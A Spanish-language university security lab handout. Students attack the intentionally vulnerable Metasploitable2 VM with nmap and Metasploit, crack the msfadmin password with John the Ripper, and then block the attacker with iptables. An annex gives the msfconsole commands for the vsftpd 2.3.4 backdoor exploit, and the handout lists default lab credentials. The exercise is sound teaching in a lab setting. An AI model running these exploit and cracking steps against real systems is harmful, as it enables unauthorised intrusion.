You are on page 1of 6

Seguridad Informática.

Práctica 1

Atacando una maquina Linux con Metasploit

1. Introducción

En esta práctica vamos a simular un ataque a una máquina Linux (vulnerable). Para ello vamos a
necesitar dos servidores, uno será el vulnerable y otro para lanzar la auditoría de seguridad sobre
el entorno vulnerable.

Software necesario:

Software de virtualización, como, por ejemplo


o VMWare o Virtual Box que es gratuito
Máquina Virtual vulnerable
o Metasploitable2 (máquina Ubuntu con programas obsoletos y llenos de
vulnerabilidade).
Herramientas de auditoría y seguridad informática, para escanear puertos (nmap),
ejecutar exploits y extraer contraseñas (John the riper) por ej.:
o Entorno Metasploit de la distribución Kalli Linux o Katoolin que instala las
herramientas y repositorios de Kali Linux.

2. Práctica

Se pide:
i. Utilizar al menos 3 vulnerabilidades diferentes para entrar a la máquina Metasploitable2.
(3 Puntos)
ii. Extraer el fichero de contraseñas de la MV Metasploitable2 y mediante el uso del software
John the Ripper conseguir la contraseña por defecto del usuario msfadmin. (2 puntos)
iii. Modificar la contraseña de msfadmin por otra de 6 caracteres e intentar romperla de
nuevo. ¿Cuánto tiempo tarda? (2 puntos)
iv. Implementar un firewall en la máquina mediante el uso de iptables que impida al atacante
acceder a la máquina. (3 puntos)
Se deberá entregar una memoria indicando en cada apartado la resolución con los pasos
seguidos en cada uno y aportando imágenes (“pantallazos”).

1
Seguridad Informática. Práctica 1

A. Anexo I: Software descargas e instalación:

A.1. Virtualbox
https://www.virtualbox.org/wiki/Downloads

A.2. Metasploitable

Descargar una máquina virtual vulnerable llamada Metasploitable 2 de este enlace:


https://sourceforge.net/projects/metasploitable/files/Metasploitable2/

A.3. Linux Kali:


Para realizar el ataque necesitamos tener instalado el escáner de puertos nmap y el entorno
metasploit. Podemos instalarlos en cualquier sistema operativo (porejmplo Katoolin) o
podemos utilizar la distribución de Linux Kali Linux, que trae ya todo instalado.

2
Seguridad Informática. Práctica 1

https://www.kali.org/downloads/
Para entornos virtualizados:
https://www.offensive-security.com/kali-linux-vm-vmware-virtualbox-image-download/

B. Instalación en VirtualBox
B.1. Máquina Virtual Metaspotaible
Una vez descargado el software se deberá añadir a un entorno virtual. A continuación,
mostramos cómo se realizaría en VirtualBox

Seleccionar fichero vmdk.


Metasploitable.vmdk

3
Seguridad Informática. Práctica 1

Usuario/clave: msfadmin/msfadmin

B.2. Máquina Virtual Linux Kali


Una vez descargada la imagen de Linux Kali virtualizada se cargará en VirtualBox.
También se puede realizar la instalación desde la imagen iso.

B.2.1. Instalación desde imagen virtualizada.


De igual forma que la anterior, pero seleccionaremos el fichero Kali-Linux-2018.3-vm-
amd64.vmdk
Usuario/clave: root/toor

B.2.2. Instalar Katoolin


Para instalar Katoolin desde nuestro equipo lo realizamos desde GitHub.
Es necesario tener instalado git.
sudo apt-get install git
Instalación Katoolin:

sudo git clone https://github.com/LionSec/katoolin.git && cp katoolin/katoolin.py <Dir_instalación>/katoolin


chmod +x <Dir_instalación>/katoolin

Una vez instalado vamos a lanzar el script con el comando:

sudo <Dir_instalación>/katoolin

Una vez lanzada la aplicación, lo primero es añadir los repositorios y actualizarlos (opción
n 1 y 2). (Para ir atrás en el menú usar back)
En la pantalla principal seleccionamos la opción “2” para que nos muestre las categorías
de las herramientas disponibles.
Una vez aquí, podemos instalar todas las herramientas necesarias para la práctica.

4
Seguridad Informática. Práctica 1

B.3. Configuración adaptadores de red


Si estamos utilizando las dos máquinas virtuales sobre un mismo entorno virtual se
deberá configurar el adaptador de red de forma que las máquinas virtuales se “vean”
entre ellas. En la configuración de la máquina virtual seleccionar el adecuado según
nuestras necesidades (no NAT).

Adaptador Puente: con esta opción, se crea una tarjeta de red virtual en nuestro
ordenador. Esta tarjeta es la que utilizará nuestra máquina virtual para acceder a la red
externa, así que es como un ordenador físico más que se conecta a la red.

Red Interna: con esta opción conseguimos que se cree una red a la que solo podrán
acceder las máquinas virtuales, de modo que siempre se pueden conectar entre ellas,
pero no a la red física.

Adaptador Sólo-Anfitrión: desde nuestro ordenador podremos acceder a las máquinas


virtuales, ya que tendremos un adaptador virtual creado expresamente para esto.

NAT: si elegimos esto, la dirección de red de la máquina virtual será la misma que la de
nuestra máquina física, pudiendo salir a Internet con nuestra dirección IP.

C. Anexo. Ejemplo del punto i.

Arrancar Servidor vulnerable Metasploitable2 e identificar su ip (comando ifconfig).

Desde el servidor “atacante” arrancar Metasploit Framework:


Con el entorno gráfico ejecutar el icono de Metasploit framework
O también se puede realizar desde la línea de comandos.
La base de datos de metasploit utiliza postgresql. Se debe arrancar el servicio.

service postgresql start

Una vez hecho hay que lanzar la base de datos de metalsploit

msfdb init

Arrancar la consola interactiva de metasploit:

msfconsole

5
Seguridad Informática. Práctica 1

Generalmente lo primero es lanzar un escaneo con nmap

db_nmap -sV ip_servidor_objetivo(=ip de Metasploitable2)

Con eso conseguiremos un listado de los servicios que corren en cada puerto de la máquina
con sus versiones correspondientes.

Usaremos de ejemplo el servidor FTP para realizar la primera incursión.


En este caso ejecutaremos este comando:

search vsftpd 2.3.4

Dándonos como resultado la existencia de un exploit valido.


Seleccionamos dicho exploit. Configuramos sus parámetros, IP destino y puerto y lo
lanzamos:

use exploit/unix/ftp/vsftpd_234_backdoor
show options
set rhost 192.168.1.232
set rport 21
exploit
Verificamos que el exploit ha funcionado.

You might also like